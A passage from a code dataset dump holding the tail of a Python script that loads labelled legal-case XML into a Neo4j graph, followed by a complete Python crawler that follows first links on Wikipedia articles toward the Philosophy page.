db.table('contensiosos')\n\n re_selector = re.compile(args.re_selector)\n\n # Initialization counting\n Filter = Query()\n\n # load graph into data\n data=(OrderedDict(),OrderedDict(),OrderedDict(),OrderedDict())\n\n # Polulate data with names\n filter_new_cases=set()\n id2title={}\n for idd,case in enumerate(contensiosos.search(Filter.title.search(re_selector))):\n if case['title'] in data[0]:\n continue\n filter_new_cases.add(case['title'])\n m = re_year.search(case['title'])\n if m:\n year=m.group(0)\n m=re_pais.match(case['meta_name']['name'])\n pais=\"unknown\"\n if m:\n pais=m.group(1).strip()\n data[0][case['title']]={'year':year}\n data[0][case['title']]['type']=1\n data[0][case['title']]['case_id']=case.doc_id\n data[0][case['title']]['country']=pais.lower()\n data[0][case['title']]['name']=case['meta_name']['name']\n id2title[str(case.doc_id)]=case['title']\n\n graph.delete_all()\n\n for case in contensiosos.search(Filter.title.search(re_selector)):\n if case['title'] not in filter_new_cases:\n continue\n # Loading the XML file\n xmlinfilename = os.path.join(args.labelled_dir,\n os.path.basename(case['txt']) + \".xml\")\n verbose(style.BRIGHT, 'Analysing ', case['txt'])\n verbose(style.BRIGHT, 'Looking for ', xmlinfilename)\n try:\n with open(xmlinfilename, \"r\") as file:\n xmltxt = file.read()\n root = ET.fromstring('\\n'+xmltxt+\"\\n\")\n except FileNotFoundError:\n verbose(fg.RED + 'ARCHIVO FALTANTE: ', style.NORMAL, xmlinfilename)\n continue\n\n data=extract_graph(root,graph,case,data)\n\n","sub_path":"src/python/label_neo4j.py","file_name":"label_neo4j.py","file_ext":"py","file_size_in_byte":8237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"281495381","text":"import urllib\nimport time\nimport requests\nfrom bs4 import BeautifulSoup\n\n\nSTART_URL = \"https://en.wikipedia.org/wiki/Special:Random\"\nTARGET_URL = \"https://en.wikipedia.org/wiki/Philosophy\"\n\ndef paragraph(tag):\n \"\"\"Returns True if an element defines a paragraph containing at least one or tag\n that is its direct descendant.\"\"\"\n return tag.name == \"p\" and tag.find([\"i\", \"a\"], recursive=False)\n\ndef info_link(tag):\n \"\"\"Returns True if an element defines a hyperlink directing to an information page.\"\"\"\n return (tag.has_attr('href') and tag.attrs['href'].startswith('/wiki/Help')) and tag.parent.name == \"p\"\n\ndef italic_string(tag):\n \"\"\"Returns True if an element defines an italic string in a paragraph.\"\"\"\n return (tag.name == \"i\" and tag.parent.name == \"p\") and (not tag.find(True) or tag.b)\n\ndef find_first_link(url):\n \"\"\"Returns the first link in a Wikipedia article as a string,\n or returns None if there is no link.\n \"\"\"\n headers = {'User-Agent': 'Mozilla/5.0'}\n response = requests.get(url, headers=headers)\n html = response.text\n soup = BeautifulSoup(html, 'html.parser')\n\n # the article's body is nested in two div tags\n content_div = soup.find(id=\"mw-content-text\").find(class_=\"mw-parser-output\")\n\n # stores the first link found in the article\n # if the article contains no links, this value will remain None\n article_link = None\n\n # Delete specified elements from the parse tree\n for element in content_div.find_all([info_link, italic_string]):\n element.decompose()\n\n # Find all the direct descendants of content_div that are paragraphs\n for p in content_div.find_all(paragraph, recursive=False):\n # Find the first anchor tag / anchor tag wrapped with an tag\n # that is a direct descendant of a paragraph\n tag = p.find([\"i\", \"a\"], recursive=False)\n # Get the URL\n article_link = tag.a.get('href') if tag.a else tag.get('href')\n break\n\n if not article_link:\n return\n\n # Build a full URL from the relative article_link URL\n first_link = urllib.parse.urljoin('https://en.wikipedia.org/', article_link)\n\n return first_link\n\ndef continue_crawl(search_history, target_url, max_steps=25):\n if search_history[-1] == target_url:\n print(\"\\nWe've found the target article!\")\n return False\n elif len(search_history) > max_steps:\n print(\"\\nThe search has gone on suspiciously long, aborting search!\")\n return False\n elif len(search_history) != len(set(search_history)):\n print(\"\\nWe've arrived at an article we've already seen, aborting search!\")\n return False\n else:\n return True\n\narticle_chain = [START_URL]\n\nwhile continue_crawl(article_chain, TARGET_URL):\n print(article_chain[-1])\n\n # Download html of the last article in article_chain\n # Find the first link in that html\n first_link = find_first_link(article_chain[-1])\n\n if not first_link:\n print(\"We've arrived at an article with no links, aborting search!\")\n break\n\n # Add the first link to the article chain\n article_chain.append(first_link)\n # Delay for about two seconds\n time.sleep(2)\n","sub_path":"wikipedia-crawler/wiki-crawler.py","file_name":"wiki-crawler.py","file_ext":"py","file_size_in_byte":3198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}